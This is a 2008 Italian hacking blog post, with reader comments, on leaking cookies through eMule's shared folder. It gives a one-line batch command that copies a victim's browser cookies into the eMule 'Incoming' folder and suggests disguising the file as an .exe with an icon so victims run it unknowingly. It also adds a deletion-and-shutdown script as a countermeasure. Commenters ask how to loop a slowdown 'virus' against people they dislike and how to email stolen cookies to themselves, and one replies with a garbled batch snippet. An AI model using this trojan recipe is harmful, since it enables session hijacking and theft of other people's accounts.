Hackissimo: Cartelle Condivise: Il pericolo è vicino!!!
Un hacker è una persona che si impegna nell'affrontare sfide intellettuali per aggirare o superare creativamente
le limitazioni che gli vengono imposte in tutti gli aspetti della sua vita. [wikipedia]

giovedì 3 aprile 2008

Cartelle Condivise: Il pericolo è vicino!!!


Oggi ho deciso di parlarvi di un problema che forse ancora non è presente nella rete (non ne ho mai sentito parlare in giro... forse sarò io ad ufficializzarlo)... Ma esiste...
Vi parlerò del grave problema che ho riscontrato nell'utilizzo delle cartelle condivise.
Durante il mio ragionamento userò come esempio la cartella “incoming” di eMule (perché si sa... ognuno ha il suo proprio mulo sul desktop).
“incoming” è la cartella dove il mulo mette tutte le cose che scarica... e tutte le cose che si vuole (o non vuole, come vedremo:]) condividere.
Ora... Chi sa dove dono sistemati i Cookies?
Io di certo NO:), ma ipotizziamo che si trovino nella cartella
“\Documents and Settings\%username%\Cookies”...
Bene, anzi, Male.
e... Chi sa dove si trova la cartella “incoming”...
IO, IO (fa il mulo): si trova in “\Programmi\eMule\Incoming”.
Bene e adesso che abbiamo fatto questa bella scoperta???
Creiamo il nostro fileuccio in batch che impone al computer di copiare tutti i cookie nella cartella condivisa:

copy "\Documents and Settings\%username%\Cookies" "\Programmi\eMule\Incoming"

[guarda la prima lezione di batch se non sai come fare]

Il povero malcapitato che aprirà in file [che possiamo anche migliorare convertendolo in .exe e dandogli un'icona ecc...] si ritroverà a condividere tutti i suoi cookies senza saperlo.
Basta che qualcuno vada su eMule, cerchi tutti i documenti presenti in rete e scelga i cookies (che sono documenti di testo del tipo “username@sito.com”), li incolli nella sua cartella “Cookies” e navighi...

Se siete dei grandissimi pirati che salvate i cookies per comodità e non volete fare a meno di eMule vi consiglio di eliminare tutti i dalla cartella “incoming” ogni volta che spegnete il computer.

Per facilitare questa operazione è meglio creare un file che faccia tutto da solo...

@del/q "\Programmi\eMule\Incoming"
shutdown -s -t 30 -c "Ho eliminato i file, puoi stare tranquillo :)"

Ci vediamo alla prossima

Delicious Diggita segnalo Technorati Technorati Technorati

12 commenti:

Daniele ha detto...

ciao,
ma quel trucchetto funzionerebbe solo se uno ha la cartella incoming in Programmi/eMule, o sbaglio? o il percorso si auto-seleziona quando apro il file? ma anche in quel caso funzionerebbe solo se apro il file nella cartella incomimg di emule dandomi il percorso della cartella in cui lo aperta, divenendo vano se apro il file dal desktop o no?.
Un altra cosa non ho capito bene, perchè cancellare i file dalla cartella incoming? per eliminare i possibili file intrusi?

Un ultima cosa. Tempo fa hai parlato della superiiorità di Gtalk (che confermo essere migliore)ma con Gtalk puoi aggiungere un contatto che non sia gmail? c'è un file-estensione che permette di farlo? se si potrò finalmente liberarmi di msn.

ciao

Shakdow ha detto...

vediamo se ti riesco a rispondere a tutto...
allora...
il trucchetto come lo chiami tu è un file che ha impostata come direzione la cartella incoming, quindi basta cambiare la direzione e puoi usarlo anche per un altra cartella.
se cancelli i file dalla cartella incoming puoi essere sicuro che nessuno potrà mai usare con te quel trucchetto... per quanto riguarda gtalk devi sapere che ho cambiato idea perchè ho trovato degli script per msn che sono fantastici... ma questa è un'altra storia.

Daniele ha detto...

capito...cmq non puoi abbandonare così gtalk, ripensaci...
il mio problema con msn è che per il mio pc risulta pesante come applicazione...senza aggiungere che gtalk è più cammuffabile per quando si chatta al lavoro...
ciao

Shakdow ha detto...

si è vero ma prova ad utilizzare a-patch (se lo ricerchi nel mio blog capirai tutto)

Anonimo ha detto...

si, forse quello che dici te è giusto... ma se pensiamo che per far andare emule + veloce serve scambiare e quindi uploadare + file possibile... come risolviamo-!!!!????

niko ha detto...

assolutamente sei un genio, ma nel mio blog c'è tutta la spiegazione su come difendersi dalla merda che gira su emule tranquillo, nel caso lo vorresti consultare è http://www.simonic11.blogspot.com

niko ha detto...

e nel caso per questo caso si usa peerguardian2, generalmente funziona

DRerAGO ha detto...

ciao!è il primo commento che lascio in questo stupendo blog...mi piace...
ti volevo chiedere se esiste un comando che permette di aggiungere una stringa al nome dei file.ad esempio il file C:\aaa.txt, può diventare C:\Nuova Cartella\159753aaa.txt?
e ancora, si farli diventare nascosti?
per la prima credo che ci sia...ho visto programmi che lo fanno (ma non in batch...).per la seconda sono un po' più dubbioso...

Anonimo ha detto...

salve, adoro questo sito, mi sto "dilettando" ank'io a creare qualke virus x incasinare il computer a qualcuno ke mi da sui nervi... io vorrei kiedere come posso far ripetere piu volte un'azione al file... preciso io vorrei far ripetere una copiature di un grosso file ke agisca in background e ke rallenti di molto il computer... come faccio x far ripetere diciamo 30 la stessa operazione?? grazie in anticipo se è fattibile....

Anonimo ha detto...

scusa la mia ignoranza ma cosa ci faccio una volta copiati i cookies

piac95 ha detto...

Scusa, non so se vado fuori tema...ma...mi sapresti dire come copiare questi cookie non so, in una mail, o inviarli direttamente a me?

piac95 ha detto...

Vorrei rispondere io ad anonimo del 17 agosto, allora, è molto semplice, tu ti crei il file batch(dovresti sapere come farlo), con il seguente codice:

open nomefiledatecreato.bat

nomefiledatecreato.bat

cmq è già scritto qui, magari lo trasformi in exe etc...